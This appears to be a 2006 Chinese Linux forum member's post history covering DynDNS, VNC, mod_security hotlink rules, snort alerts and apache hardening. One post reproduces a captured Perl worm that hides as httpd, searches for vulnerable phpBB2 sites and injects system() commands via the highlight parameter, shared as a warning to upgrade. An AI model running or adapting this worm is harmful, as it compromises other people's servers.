顯示文章

這裡允許您檢視這個會員的所有文章。請注意, 您只能看見您有權限閱讀的文章。


文章 - fz150n

頁: 1 [2] 3 4
31
管它IP變不變呢?

我想我們不會在意GOOGLE的IP變成什麼吧?
每次要查資料,不就直接用GOOGLE TOOL BAR,
不然就輸入http://www.google.com.tw/  ???

代碼: [選擇]
Server:  hntp1.hinet.net
Address:  168.95.192.1

Non-authoritative answer:
Name:    www.l.google.com
Addresses:  66.102.7.104, 66.102.7.99, 66.102.7.147
Aliases:  www.google.com.tw, www.google.com

Non-authoritative answer:
Name:    www.l.google.com
Addresses:  66.102.7.147, 66.102.7.104, 66.102.7.99
Aliases:  www.google.com.tw, www.google.com

Non-authoritative answer:
Name:    www.l.google.com
Addresses:  66.102.7.104, 66.102.7.99, 66.102.7.147
Aliases:  www.google.com.tw, www.google.com


現在哪裡還會有人上網直接用IP?

哪天酷學園搬家的時候,難不成還要通知大家,喂喂喂,酷學園的IP已經改了喔,從今天起,酷學園從203.68.102.240變成xxx.xx.xxx.xxx囉~

參考而已啦~

只是這樣一個thread搞這麼久,實在很浪費網路資源,快別鬧了~

32
Linux 討論版 / vnc已開啟,為什麼卻連不上 !?
« 於: 2006-05-29 10:39 »
那可能就表示你的VNCSERVER沒啟動成功。

過程有點麻煩,比如說要設定密碼檔之類的,建議你找一下GOOGLE,
或者在你啟動VNCSERVER的時候,開另外一個視窗,用這個指令看看錯誤:

tail -f /var/log/message

用putty會比較方便。

如果只是想看看從WINDOWS連過去LINUX的桌面是長甚麼樣子,
那就別太辛苦了,平常管理主機的時候不太會這樣用的。

33
啊? 什麼?  還沒試?

是這樣的,

1. 你到dyndns.org註冊一個帳號,然後去指定一個主機名稱,
網域只能選擇他們提供的如:dyndns.org   ath.cx  ,也就是你申請下來之後會變成這樣:

xxx.dyndns.oprg    or
xxx.ath.cx

2. 接著去下載更新程式,幫助你更新IP及主機名稱的對應,
我幫你找了一個比較好設定的了:

http://nchc.dl.sourceforge.net/sourceforge/ddclient/ddclient-3.6.7.tar.gz

用法自個兒用功用功囉~

如果主機名稱不多,其實根本不需要自己架一台DNS Server,越多服務就越多給人入侵的機會,更何況,DYNDNS還提供你可以收信的服務耶~

34
如果不介意用免費的DNS服務,可以考慮用dyndns.org的服務。

平常我自己在家裡就是用它們的服務,主機名稱就像是:

xxxx.dyndns.org

他們提供一支小程式,看是安裝在windows也好,LINUX也可以,
如果你的IP SHARING支援更好,

這三種自動更新的方式我都用過,目前還沒凸捶過,後來因為發現我的D-Link
704UP有支援,所以我就把更新代理程式交給他去處理了。

以後只要你的IP有變動,他就會自動更新,而且也支援MX紀錄。

參考網址:
http://www.dyndns.org/

要花點時間看英文,不然會找不到在哪裡設定。    :D

35
系統安全討論版 / mod_security的一些疑問
« 於: 2006-05-27 23:06 »
仔細看了一下文件,我想應該是沒有指定ACTION的關係,
於是,我把我自己的盜連黑名單建立出來,
並且加了一個選項:

SecFilterDefaultAction "deny,status:404"

代碼: [選擇]
SecFilterDefaultAction "deny,status:404"
SecFilterSelective HTTP_Referer|ARGS "\.myspace\.com"
SecFilterSelective HTTP_Referer|ARGS "\.dvd4arab\.com"
SecFilterSelective HTTP_Referer|ARGS "\.thaidvd\.net"
SecFilterSelective HTTP_Referer|ARGS "\.invisionfree\.com"
SecFilterSelective HTTP_Referer|ARGS "\.midnightthailand\.com"
SecFilterSelective HTTP_Referer|ARGS "\.alsayra\.com"
SecFilterSelective HTTP_Referer|ARGS "\.blogtw\.com"
SecFilterSelective HTTP_Referer|ARGS "\.oxxk\.com"
SecFilterSelective HTTP_Referer|ARGS "\.ccmove\.com"
SecFilterSelective HTTP_Referer|ARGS "\.blogspot\.com"
SecFilterSelective HTTP_Referer|ARGS "\.nexopia\.com"
SecFilterSelective HTTP_Referer|ARGS "\.toplog\.nl"
SecFilterSelective HTTP_Referer|ARGS "\.splinder\.com"
SecFilterSelective HTTP_Referer|ARGS "\.the-internationals\.com"
SecFilterSelective HTTP_Referer|ARGS "\.ath\.cx"
SecFilterSelective HTTP_Referer|ARGS "\.btuga\.info"
SecFilterSelective HTTP_Referer|ARGS "\.movie-family\.de"
SecFilterSelective HTTP_Referer|ARGS "\.lide\.cz"
SecFilterSelective HTTP_Referer|ARGS "\.blogcn\.com"
SecFilterSelective HTTP_Referer|ARGS "\.warez4ever\.net"
SecFilterSelective HTTP_Referer|ARGS "\.tracker\.traasje\.nl"


結果總算是我要的了:

引用
82.52.67.188 - - [27/May/2006:22:52:54 +0800] "GET /somewhere/somepict.JPG HTTP/1.1" 404 1229 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=24065413" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.6) Gecko/20050226 Firefox/1.0.1"
24.98.140.78 - - [27/May/2006:22:53:01 +0800] "GET /somewhere/somepict.JPG HTTP/1.1" 404 1227 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=7429408" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3"
216.43.46.3 - - [27/May/2006:22:53:21 +0800] "GET /somewhere/somepict.JPG HTTP/1.1" 404 1319 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=33780113&MyToken=6e5934b6-e93b-4c81-8eae-2c5092399c9f" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.7.7)"
71.247.230.34 - - [27/May/2006:22:53:51 +0800] "GET /somewhere/somepict.JPG HTTP/1.1" 404 1229 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=18218859" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"


如果沒有status:404的話,我擔心被擋掉的網站會很不爽,
因為預設就會出現禁止存取的錯誤,所以我改成預設為404 Not Found

為什麼我想擋,倒也不是我的網佔有什麼機密資料,只是覺得給人家連好玩的,
頻寬又有限,就給它有點$@#$!@#:

這是awstats的統計:
引用
http://profile.myspace.com/index.cfm   64733
http://www.dvd4arab.com/forums/showthread.php   3569
http://www.thaidvd.net/forum/upload/index.php   1150
http://s14.invisionfree.com/Da_DC_Board/index.php   1087
http://82.192.81.14   854
http://www.midnightthailand.com   790
http://www.alsayra.com/vb/showthread.php   750
http://www.blogtw.com/blog.php   540
http://www.oxxk.com/vod/mlist.asp   525
http://blog.ccmove.com/joebow/   525
http://sharingmania.blogspot.com/2005_12_01_sharingmania_archive...   497
http://www.nexopia.com/profile.php   494
http://kiara15.toplog.nl   432
http://interzoneblog.splinder.com   378
http://torrent.the-internationals.com/details.php   369
http://tnt-torrents.ath.cx/index.php   354
http://www.btuga.info/viewthread.php   343
http://www.movie-family.de   336
http://82.192.81.14/details.php   332
http://blog.lide.cz/Michelle8/   324
http://www.blogcn.com/User13/crow119/index.html   317
http://warez4ever.net/modules.php   249
http://tracker.traasje.nl   214
http://www.bloghk.com/blog.php   202
http://dir.yam.com/ent/movies/mov%5Fpos/   197
http://www.hi5.com/friend/profile/displayProfile.do   196
http://nest.munihei.de/index.php   180
http://comments.myspace.com/index.cfm   179
http://www.newsgarden.net/modules.php   158
http://www.sharezade.net/index.php   158
http://www.blog.central.is/fannyfrikka   150
http://movie.eooeo.com/yule/movie/oumei/   135
http://blog.myspace.com/index.cfm   125
http://mazecontroller.livejournal.com   111
http://partyflock.nl/user/193355.html   108



你看,光一個myspace.com就一堆連結,跟他又沒有合作關係,
所以擋掉是應該的吧~   :D  :D


附註:

mod_security  不是   apache  預設安裝的,目前最新版是1.9.4,有興趣的人可以參考:

官方首頁:
http://www.modsecurity.org/index.php

簡介:
http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

專家寫好的規則:
http://www.gotroot.com/tiki-index.php?page=mod_security+rules

安裝   mod_security 需要 httpd-devel套件,及其他相關套件,缺的時候再去抓回來裝就好了。

代碼: [選擇]
apxs -cia mod_security.c

安裝好之後,模組會自動存放到指定的目錄,但是先不要重新啟動httpd,緊接著把你可能會用到的那些rule解壓縮,並且放到相關位置,如Fedora   /etc/httpd/conf.d
接著修改必要的內容,最後再把服務重新啟動或重新載入。

我想建議大家多多使用這個模組,不要說盜連,其實很多入侵行為都是藉由網頁而植入惡意程式的,修補及更新當然是需要的,但是如果能藉由一些現成的套件來對自己的網站多一些防護的話,我想安全性還是可以提高一些。

36
系統安全討論版 / mod_security的一些疑問
« 於: 2006-05-27 19:28 »
想請問一下,

前陣子小弟貼過了一篇關於Web Server被盜連的問題,
雖然使用了rewrite engine,結果還是沒有成效,現在改用
mod_security了,結果有這樣的紀錄:


access_log
代碼: [選擇]
70.35.23.196 - - [27/May/2006:19:11:14 +0800] "GET /somewhere/c/somepict.JPG HTTP/1.1" 200 73498 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=2348777" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6"

error_log
代碼: [選擇]
70.35.23.196 - - [27/May/2006:19:11:14 +0800] "GET /somewhere/c/somepict.JPG HTTP/1.1" 200 73498 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=2348777" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6"

modsec_audit.log
代碼: [選擇]
Request: www.example.com.tw 70.35.23.196 - - [27/May/2006:19:11:16 +0800] "GET /somewhere/c/somepict.JPG HTTP/1.1" 200 73498 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=2348777" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6" - "-"

依照http status code看來,200    那不就表示其實這個存取的動作,
還是成功了呢?

這是我的mod_security的設定:
代碼: [選擇]
SecFilterSelective HTTP_Referer|ARGS "\.myspace\.com"

請問我應該怎麼做才能有效防止這個盜連呢?  profile.myspace.com

謝謝!

37
database 討論版 / mysql資料庫錯誤如何排除??
« 於: 2006-05-27 08:27 »
這個錯誤看來像是php頁面呼叫mysql_pconnect時發生錯誤,

你可以試試看先從命令列的mysql進入server看看,

mysql DBNAME -uroot -pyuourpassword

如果進不去,那就重新啟動mysql

怎麼重新啟動,就要看你用的是甚麼作業系統囉~

如果是RedHat  大概只要用
service mysql restart    or
service mysqld restart

如果自己裝的,那就看你裝的路徑在哪裡,然後手動重新啟動一次看看。

如果你有裝一些如phpbb2, phpnuke之類的web軟體,
那就要看看版本是不是最新,如果不是,就我所知的phpBB2 2.0.10以前的版本,
是非成非常容易被侵入的。

所以看一下你的/tmp囉~

如果有甚麼叫做pikachu的,還是hacking的,搞不好有doraemon,
那就是被人植入了。

這些檔案名稱常常會以   .    為開頭(dot)所以你至少要用
l.

ls -al
來檢查你的目錄。

38
各位前輩,

小弟最近在練習使用snort,收集一陣子之後,一直發現我附加的錯誤,

my.server.ip.addr指的就是我伺服器的ip,
也就是說snort發現自己一直對外做port scan ??????

好奇怪喔,難道主機已經遭人植入木馬?
還是snort誤判?

payload的內容大概就是
Open Port: 25
Open Port: 443
之類的。

可否請問一下,我的SERVER發稱什麼問題了呢?

謝謝!

p.s 真抱歉,這樣讀起來有點困難,因為我是直接在BASE的畫面摳下來的。
引用
  #0-(1-4461)  [snort] (portscan) Open Port: 25  2006-05-26 22:57:20  my.server.ip.addr  168.95.5.154  Raw IP  
   #1-(1-4459)  [snort] (portscan) Open Port: 25  2006-05-26 22:57:17  my.server.ip.addr  168.95.5.118  Raw IP  
   #2-(1-4458)  [snort] (portscan) Open Port: 25  2006-05-26 22:57:16  my.server.ip.addr  168.95.5.116  Raw IP  
   #3-(1-4439)  [snort] (portscan) Open Port: 25  2006-05-26 22:55:31  my.server.ip.addr  168.95.5.157  Raw IP  
   #4-(1-4440)  [snort] (portscan) Open Port: 25  2006-05-26 22:55:31  my.server.ip.addr  168.95.5.116  Raw IP  
   #5-(1-4441)  [snort] (portscan) Open Port: 25  2006-05-26 22:55:31  my.server.ip.addr  168.95.5.118  Raw IP  
   #6-(1-4438)  [snort] (portscan) TCP Portsweep  2006-05-26 22:55:30  my.server.ip.addr  168.95.5.155  Raw IP  
   #7-(1-3987)  [snort] (portscan) UDP Portscan: 53:1027  2006-05-26 17:12:18  168.95.1.1  my.server.ip.addr  Raw IP  
   #8-(1-3802)  [snort] (portscan) TCP Portsweep  2006-05-26 14:05:33  my.server.ip.addr  61.31.235.245  Raw IP  
   #9-(1-3766)  [snort] (portscan) TCP Portsweep  2006-05-26 13:18:11  my.server.ip.addr  195.225.218.139  Raw IP  
   #10-(1-3729)  [snort] (portscan) Open Port: 25 2006-05-26 12:19:29  my.server.ip.addr  212.53.64.68  Raw IP  
   #11-(1-3728)  [snort] (portscan) Open Port: 25 2006-05-26 12:19:28  my.server.ip.addr  213.152.250.13  Raw IP  
   #12-(1-3727)  [snort] (portscan) TCP Portsweep  2006-05-26 12:19:28  my.server.ip.addr  213.152.250.13  Raw IP  
   #13-(1-3705)  [snort] (portscan) Open Port: 2703 2006-05-26 11:34:22  my.server.ip.addr  66.151.150.35  Raw IP  
   #14-(1-3702)  [snort] (portscan) Open Port: 2703 2006-05-26 11:33:33  my.server.ip.addr  66.151.150.35  Raw IP  
   #15-(1-3701)  [snort] (portscan) Open Port: 2703 2006-05-26 11:33:09  my.server.ip.addr  66.151.150.35  Raw IP  
   #16-(1-3700)  [snort] (portscan) Open Port: 2703 2006-05-26 11:32:57  my.server.ip.addr  66.151.150.35  Raw IP  
   #17-(1-3699)  [snort] (portscan) Open Port: 2703 2006-05-26 11:32:56  my.server.ip.addr  66.151.150.35  Raw IP  
   #18-(1-3698)  [snort] (portscan) Open Port: 2703 2006-05-26 11:32:53  my.server.ip.addr  66.151.150.35  Raw IP  
   #19-(1-3697)  [snort] (portscan) Open Port: 2703 2006-05-26 11:32:51  my.server.ip.addr  66.151.150.35  Raw IP  
   #20-(1-3696)  [snort] (portscan) Open Port: 2703 2006-05-26 11:32:50  my.server.ip.addr  66.151.150.35  Raw IP  
   #21-(1-3695)  [snort] (portscan) Open Port: 25 2006-05-26 11:32:49  my.server.ip.addr  213.152.250.13  Raw IP  
   #22-(1-3693)  [snort] (portscan) Open Port: 25 2006-05-26 11:32:47  my.server.ip.addr  212.53.64.115  Raw IP  
   #23-(1-3694)  [snort] (portscan) Open Port: 2703 2006-05-26 11:32:47  my.server.ip.addr  66.151.150.35  Raw IP  
   #24-(1-3692)  [snort] (portscan) TCP Portsweep  2006-05-26 11:32:47  my.server.ip.addr  212.53.64.115  Raw IP  
   #25-(1-3622)  [snort] (portscan) TCP Portsweep  2006-05-26 10:23:32  my.server.ip.addr  66.150.161.57  Raw IP  
   #26-(1-3459)  [snort] (portscan) Open Port: 25 2006-05-26 07:47:40  my.server.ip.addr  213.152.250.13  Raw IP  
   #27-(1-3458)  [snort] (portscan) TCP Portsweep  2006-05-26 07:47:40  my.server.ip.addr  213.152.250.13  Raw IP  
   #28-(1-3453)  [snort] (portscan) TCP Portsweep  2006-05-26 07:45:55  my.server.ip.addr  61.31.235.245  Raw IP  
   #29-(1-3165)  [snort] (portscan) TCP Portsweep  2006-05-26 04:15:03  my.server.ip.addr  61.31.235.245  Raw IP  
   #30-(1-3011)  [snort] (portscan) TCP Portsweep  2006-05-26 03:17:00  my.server.ip.addr  64.14.244.60  Raw IP  
   #31-(1-3009)  [snort] (portscan) TCP Portsweep  2006-05-26 03:14:26  my.server.ip.addr  61.31.235.245  Raw IP  
   #32-(1-3002)  [snort] (portscan) TCP Portsweep  2006-05-26 03:04:38  my.server.ip.addr  61.31.235.245  Raw IP  
   #33-(1-2933)  [snort] (portscan) Open Port: 25 2006-05-26 01:54:06  my.server.ip.addr  212.53.64.82  Raw IP  
   #34-(1-2932)  [snort] (portscan) TCP Portsweep  2006-05-26 01:54:06  my.server.ip.addr  212.53.64.82  Raw IP  
   #35-(1-2843)  [snort] (portscan) Open Port: 25 2006-05-26 00:00:40  my.server.ip.addr  212.53.64.68  Raw IP  
   #36-(1-2842)  [snort] (portscan) Open Port: 25 2006-05-26 00:00:36  my.server.ip.addr  212.53.64.82  Raw IP  
   #37-(1-2841)  [snort] (portscan) TCP Portsweep  2006-05-26 00:00:36  my.server.ip.addr  212.53.64.82  Raw IP  
   #38-(1-2834)  [snort] (portscan) TCP Portsweep  2006-05-25 23:47:40  my.server.ip.addr  204.251.15.174  Raw IP  
   #39-(1-2674)  [snort] (portscan) Open Port: 80 2006-05-25 21:54:46  my.server.ip.addr  216.92.131.66  Raw IP  
   #40-(1-2672)  [snort] (portscan) Open Port: 80 2006-05-25 21:54:39  my.server.ip.addr  216.92.131.66  Raw IP  
   #41-(1-2673)  [snort] (portscan) Open Port: 80 2006-05-25 21:54:39  my.server.ip.addr  216.92.131.66  Raw IP  
   #42-(1-2671)  [snort] (portscan) Open Port: 80 2006-05-25 21:54:34  my.server.ip.addr  216.92.131.66  Raw IP  
   #43-(1-2670)  [snort] (portscan) TCP Portsweep  2006-05-25 21:54:24  my.server.ip.addr  212.53.64.82  Raw IP  
   #44-(1-2551)  [snort] (portscan) Open Port: 80 2006-05-25 19:34:07  my.server.ip.addr  218.1.14.162  Raw IP  
   #45-(1-2549)  [snort] (portscan) TCP Portsweep  2006-05-25 19:29:28  my.server.ip.addr  202.102.16.11  Raw IP  
   #46-(1-2422)  [snort] (portscan) Open Port: 443 2006-05-25 17:30:12  66.249.66.65  my.server.ip.addr  Raw IP  
   #47-(1-2423)  [snort] (portscan) Open Port: 80 2006-05-25 17:30:12  66.249.66.65  my.server.ip.addr  Raw IP  
   #48-(1-2421)  [snort] (portscan) TCP Portscan: 80:443 2006-05-25 17:30:12  66.249.66.65  my.server.ip.addr  Raw IP  
   #49-(1-2389)  [snort] (portscan) Open Port: 25 2006-05-25 16:58:47  my.server.ip.addr  212.53.64.115  Raw IP  

39
Linux 討論版 / vnc已開啟,為什麼卻連不上 !?
« 於: 2006-05-26 16:51 »
啟動完成的紀錄:
所以是5901,所以~   也可以透過瀏覽器連過去的樣子,
但是我現在不方便測,你自己試試看。
引用


 tail -f /home/tony/.vnc/www.fz150.com:1.log

Fri May 26 16:59:58 2006
 vncext:      VNC extension running!
 vncext:      Listening for VNC connections on port 5901
 vncext:      Listening for HTTP connections on port 5801
 vncext:      created VNC server for screen 0
error opening security policy file /usr/X11R6/lib/X11/xserver/SecurityPolicy
Could not init font path element /usr/X11R6/lib/X11/fonts/TTF/, removing from list!
Could not init font path element /usr/X11R6/lib/X11/fonts/CID/, removing from list!

40
Linux 討論版 / vnc已開啟,為什麼卻連不上 !?
« 於: 2006-05-26 16:39 »
這我有遇過,
只是時間有點久遠了~   哈

我跟你說,你用著個命令看一下開啟中的連接埠

netstat -ant | grep 59

然後看看是不是有5901    5902    之類的,

然後你的VNC要連過去的時候,指定那個Port就行了。

linux 預設的VNC port不同吧?   我記得好像是這樣的,
記得要升級!

41
sendmail.cf

SmtpGreetingMessage

改之前先備份喔~

42
Linux 討論版 / phpbb2安不安全,我已被駭2次
« 於: 2006-05-22 17:09 »
要很小心,要常常注意更新資訊,
我覺得現在好像已經趨向:

先看看有沒有人把漏洞找出來,然後再用這漏洞去拿別人的電腦測試。

但是既然是互動式網頁,要輸入惡意的URL來執行下載程式就容易多了,
雖然我也還是不知道他們是怎麼弄的啦~

但是我覺得可以好好把http的log存起來,一旦發現之後就可以比較好追溯。

如果你用Linux作業系統的話,到/tmp底下找找,一定有一堆  點開頭   的檔案。
不然就是有    空白    的目錄。

43
系統安全討論版 / apache 2 安全實做
« 於: 2006-05-21 21:58 »
今天實做了一下,但是版上並好像沒有很多這方面的文章,於是我到
GOOGLE找了一個下午,看來暫時是沒有解答了。

我的作業系統是Fedora Core 3,一般安裝,
想安裝的是apache-2.2.2,依照我先前找到的文章一步一步做,
光是chroot到/chroot/httpd時就困難重重,最後停在http- error-log:

代碼: [選擇]
[Sun May 21 12:20:30 2006] [crit] (6)No such device or address: apr_proc_detach failed
Pre-configuration failed


這裡有片段的strace紀錄:
代碼: [選擇]

uname({sys="Linux", node="rhel", ...})  = 0
stat64("/root", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat64(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getcwd("/", 4096)                       = 2
getpid()                                = 20678
open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib/gconv/gconv-modules", O_RDONLY) = -1 ENOENT (No such file or directory)
getppid()                               = 20677
getpgrp()                               = 20677
rt_sigaction(SIGCHLD, {0x8077263, [], SA_RESTORER, 0xb6ca48}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
open("/usr/local/apache2/bin/apachectl", O_RDONLY|O_LARGEFILE) = 3
ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffeb5c8) = -1 ENOTTY (Inappropriate ioctl for device)
_llseek(3, 0, [0], SEEK_CUR)            = 0
read(3, "#!/bin/sh\n#\n# Copyright 2000-200"..., 80) = 80
_llseek(3, 0, [0], SEEK_SET)            = 0
getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=1024}) = 0
dup2(3, 255)                            = 255
close(3)                                = 0
fcntl64(255, F_SETFD, FD_CLOEXEC)       = 0
fcntl64(255, F_GETFL)                   = 0x8000 (flags O_RDONLY|O_LARGEFILE)
fstat64(255, {st_mode=S_IFREG|0755, st_size=3282, ...}) = 0
_llseek(255, 0, [0], SEEK_CUR)          = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
read(255, "#!/bin/sh\n#\n# Copyright 2000-200"..., 3282) = 3282


代碼: [選擇]

stat64("/usr/local/apache2/bin/envvars", {st_mode=S_IFREG|0644, st_size=837, ...}) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
stat64("/usr/local/apache2/bin/envvars", {st_mode=S_IFREG|0644, st_size=837, ...}) = 0
access("/usr/local/apache2/bin/envvars", X_OK) = -1 EACCES (Permission denied)
open("/usr/local/apache2/bin/envvars", O_RDONLY|O_LARGEFILE) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=837, ...}) = 0
read(3, "# Copyright 2001-2005 The Apache"..., 837) = 837
close(3)                                = 0

....

pipe([3, 4])                            = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
_llseek(255, -877, [2405], SEEK_CUR)    = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7ff1708) = 20679
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGCHLD, {0x8077263, [], SA_RESTORER, 0xb6ca48}, {0x8077263, [], SA_RESTORER, 0xb6ca48}, 8) = 0
close(4)                                = 0
read(3, "1024\n", 128)                  = 5
read(3, "", 128)                        = 0
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x807603b, [], SA_RESTORER, 0xb6ca48}, {SIG_DFL}, 8) = 0
waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0) = 20679
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
waitpid(-1, 0xbffeac9c, WNOHANG)        = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigaction(SIGINT, {SIG_DFL}, {0x807603b, [], SA_RESTORER, 0xb6ca48}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
read(255, "# --------------------          "..., 3282) = 877
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=1024}) = 0
getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=1024}) = 0
setrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=1024}) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
_llseek(255, -14, [3268], SEEK_CUR)     = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7ff1708) = 20680
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], WNOHANG) = 20680
waitpid(-1, 0xbffead0c, WNOHANG)        = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x807603b, [], SA_RESTORER, 0xb6ca48}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x807603b, [], SA_RESTORER, 0xb6ca48}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
read(255, "\nexit $ERROR\n\n", 3282)    = 14
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
exit_group(0)                           = ?



好難喔,是不是FC3的關係?

44
系統安全討論版 / phpBB2趕快升級喔~
« 於: 2006-05-21 09:57 »
原來都是利用phpBB2的漏洞跑進來的,各位的phpBB2版本如果是下面程式碼裡面列出的話,就趕快升級囉。

(第一行還要註明他的e-mail,真是夠了。)

phpBB2 2.0.20 升級頁面:
http://phpbb-tw.net/phpbb/viewtopic.php?t=43968

後來雖然我還是決定暫時先把phpBB2移除了,但是可否請學長們教一下,咱們的酷學園是如何做好安全防護的呢?

代碼: [選擇]


###### psyclon.br@gmail.com ######

use strict;
use IO::Socket;
use IO::Handle;


my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $s= (int(rand(281)));
    if ($rnd>1000) { $s= (int(rand(100)))}
 
   

    my @str=(
             "by+phpBB+2.0.4+",
"by+phpBB+2.0.5+",
"by+phpBB+2.0.6+",
"by+phpBB+2.0.7+",
"by+phpBB+2.0.8+",
"by+phpBB+2.0.9+",
"by+phpBB+2.0.10+",
         


 );

    my $query="search.msn.com.br/results.aspx?q=";
    $query.=$str[(rand(scalar(@str)))].$rnd;
    $query.="&first=$s";

    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/msn|cache|hotmail/){
            push (@lst,$1);
        }
    }
   
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
        my @r = <$sock>;
        $page="@r";
        alarm 0;
        close($sock);
    };    
    return $page;

}

eval {fork and exit;};

my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;






while(time<$oneday){
    @urls=fetch();
    foreach $url (@urls) {
        if ($url !~ /viewtopic.php/) {next;}
        $url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
        my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
        $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
        $page = http_query($url);
        if ( $page =~ /jSVowMsd/ ){
            $url =~ s/&highlight.*//;
            my $upload=$url;
            $upload =~ s/viewtopic.*//;
            $cmd=encode("$cmd");    # set cmd
            $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
            $page = http_query($url);
            $cmd=encode("$cmd");    # set cmd
            $url =~ s/&highlight.*//;
            $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
            $page = http_query($url);
        }

    }
}

45
系統安全討論版 / apache 2 安全實做
« 於: 2006-05-20 16:36 »
前陣子想升級apache 2,但因受限於Fedora Core 3的關係,
沒有更新的版本可升級,所以萌生了自行編譯的念頭。

我覺得這篇文章寫得很好,包括mysql, PHP,所以其實它是一系列的:

